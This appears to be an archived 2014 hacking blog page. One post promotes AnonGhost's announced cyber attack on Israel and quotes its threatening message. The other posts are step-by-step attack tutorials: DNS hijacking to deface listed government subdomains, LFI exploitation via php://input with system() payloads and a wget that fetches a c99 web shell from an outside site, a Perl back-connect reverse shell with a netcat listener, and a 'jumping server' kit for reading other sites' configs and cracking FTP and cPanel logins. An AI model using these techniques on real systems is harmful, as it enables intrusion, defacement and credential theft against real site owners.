Friday, 14 March 2014

Labels:

AnonGhost Announces another Cyber Attack over Israel on 7th April 2014

Posted by Surgical Strike at 14:50 No comments :

AnonGhost have announced another Cyber Attack over Israel on 7th April 2014. the  Operation which is Named as "Op Israel Birthday" was announced few days back with a Official Video release Over Youtube.







Israel is one of the biggest target of Muslim hackers around the globe, And with addition to daily Attacks by Hackers they have already suffered several Cyber Attacks in the past few years including #OpIsrael #OpIsraelReborn and several others.

And this time, the Cyber Attack announced almost 3 months before the Final day, it seems like Hackers will be able to reunify and prepare before the attack, The Operation is already being promoted over social Networks for more and more Participation.

The Official Video release on Youtube, depicts War crime and Violence, The Video also delivers a short message to Israel.

Hi Israel!!
We are AnonGhost Team!!
We are always here to punish you, as we did in the last operation on the 7th of April..
And we are back again to celebrate it, Because we are the voice of Palestine and we will not remain silent.
Muslims are Everywhere.
Israel Doesn't exist its only Palestine...
The 7th of April every year will be a Victory celebration..
We are proud of what we did before and after 1 year we are capable to take this to another level..
We won't forgive your Crime against our brothers in Palestine..
You better watch.
and Expect us.





Looking over the previous few attacks, It is possible that the Cyber attack this time can cause Israel to face cyber Blackout on the final day including big leaks, Defacement and bringing Down Government websites.
Read More

Thursday, 13 March 2014

Labels:

000webhost DNS Hijacking Vulnerablity

Posted by Surgical Strike at 14:37 No comments :

So let see the DNS Hijacking Vulnerablity making Thousends of Websites hosted on 000webhost and other free hosting webhosting Proivders.

Step 1 : signup for a account on 000webhost.com
it will give you a address like abcd.something.com
for example mine was : http://testingfu.comule.com

Now Goto cPanel
and Look for IP Adress, you'll get something like "31.170.163.140"

Now Goto Bing .com and type dork ip:31.170.163.140 
if you want .gov .edu or any other particular domain then dork will " ip:31.170.163.140 .gov "
or " ip:31.170.163.140 .edu "
all server ips
Server 1 with 253 ips
31.170.161.1 - 31.170.161.253

Server 2 with with 253 ips 
31.170.162.1 - 31.170.162.253

Server 3 with 242 ips
31.170.163.1 - 31.170.163.241
Now come to Search Results 
 i got The Target csirt.gov.bd
i just open this url :
abcd.csirt.gov.bd
and here a error page of 000webhost.


which shows that the dns is configured so that the site is forwarded to Nameserver of 000webhost 
now what i did is enter in my cpanel which i created at 000webhost and park a subdomain :

cats.jpg (467×213)
cats.jpg (577×512)
men.csirt.gov.bd
bd.csirt.gov.bd
and done added a deface page to my public_html
and the website defaced .

Some of the sites for example which are vulnreable for this attack 

http://test.fraymamertoesquiu.gov.ar

http://test.concejodeitagui.gov.co

http://dns.hviota.gov.co

http://test.digitizeyou.in

http://men.csirt.gov.bd

http://bd.csirt.gov.bd

Read More
Labels:

LFI EXPLOITATION VIA PHP://input

Posted by Surgical Strike at 10:37 No comments :





                                    Hey guys,

Today I'll be explaining how to shell a website using "php://input" method via LFI.


So let's get started.
Now let's have our target shall we. As an example, your target URL should look like this:

Code:
http://www.site.com/index.php?page=
You can have anything similar to that as long as you can be able to read files and obtain an "include" error.


First things first, give it a shot and see if you can read "/etc/passwd"


URL will look like:
Code:
http://www.site.com/index.php?page=/etc/passwd

If successful, you'll be having a page that looks like this:

                      


Now lets try reading:
Code:

/proc/self/environ



/proc/self/fd

So URL will become:
Code:

http://www.site.com/index.php?page=/proc/self/environ



http://www.site.com/index.php?page=/proc/self/fd

Hmm, seems like nothing is being displayed, even though I've added a null-byte at the end of the URL.

                      


Well, not to worry, it's time to use our back up method. The "php://input" method will help us read files with certain commands, hence enables us to upload a shell.
This can be done using the "Hackbar" or by using "Live HTTP headers"



I'll show you how to exploit via php://input using the "Hackbar"


So lets check what we're supposed to use in the Hackbar

                     


Now let's try putting this method in action.
Look at the picture carefully.


                     


URL will be:
Code:
http://www.site.com/index.php?page=php://input

and POST DATA:
Code:
<? system('uname -a'); ?>

Other commands
List directories

Code:
 <? system('ls'); ?>

Identification
Code:
<? system('id'); ?>

Convert format
Code:
<? system('mv file.txt file.php'); ?>

Alright, let's spawn a shell there now shall we.


Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell

Code:
http://www.sh3ll.org/c99.txt?


Let's use the "wget" command to spawn our shell on the site.


So our POST DATA will be:
Code:
<? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php');?>

This is how it's gonna look like.

                    


Now that you've spawn a shell, you can now navigate to your shell on the site.
Code:
http://www.site.com/shell.php
Read More

Wednesday, 12 March 2014

Labels:

Shell Backconnect Perl Script

Posted by Surgical Strike at 09:34 No comments :


Shell Backconnect Perl Script

Download Link : Click Here ..!!!



Usage: perl bc.pl [Host] [Port]



Example : perl bc.pl computer-real-ip port

Method :
Open netcat type nc -nlvp 444

Hit Enter Button

now goto Shelled site

Execute Command

Chmod +x bc.pl

then execute command

perl bc.pl pc-ip port
Read More

Tuesday, 11 March 2014

Labels:

Jumping Server Full Tutorial

Posted by Surgical Strike at 19:49 No comments :

REQUIREMENTS:

AN SHELLED WEBSITE
JUMPING SERVER FILES. WHICH YOU CAN DOWNLOAD HERE 

STEP TO HACK WITH JUMPING SERVER:

1. Go to your shell and upload zip file - jumping.php to your shell



2. Now Unzip jumping.php by this command - unzip jumping.zip


3. If you had commanded correctly then it will look like this 


4.After successfully unziping it ,Now if you had uploded jumping.php in public_html then you can go here http://www.site.com/jumping or if you upload in other then specify it in URL
After Opening this URL you will see like this 


5.You will see an file name barcode mini.php just after the Parent Directory as you can see in the image above. Click On It after it is open you will see page like this 


Note : Just near the Apache Server at Port 80 you will see white blank so click on it and just enter the password
Password – hackers

6.After this now open jump.php and wait till  it scans for all readable sites on server.
  Once it is done you will see page like this 


7.All the above are directly readable. Now will run scanner.php it will read for config file in those dir once done it shows us like this



8.Now lets take one of them and put it in our barcode mini.php and see if it allow us to see database


9.And if you will get access to the database then it will be seen like this


10.This  also have included two more files sql.php domain.php. this will help you to get website name and get in to database..cracker.php tries to crack ftp+ cpanel… Updated barcode.php This shell is the newer version of barcode mini.php it is all in one shell. it has jump, scanner, cracker, and checker included in one shell


Download barcode.php here -http://www.mediafire.com/?z5x7rf167rtv5ek
Read More
Subscribe to: Posts ( Atom )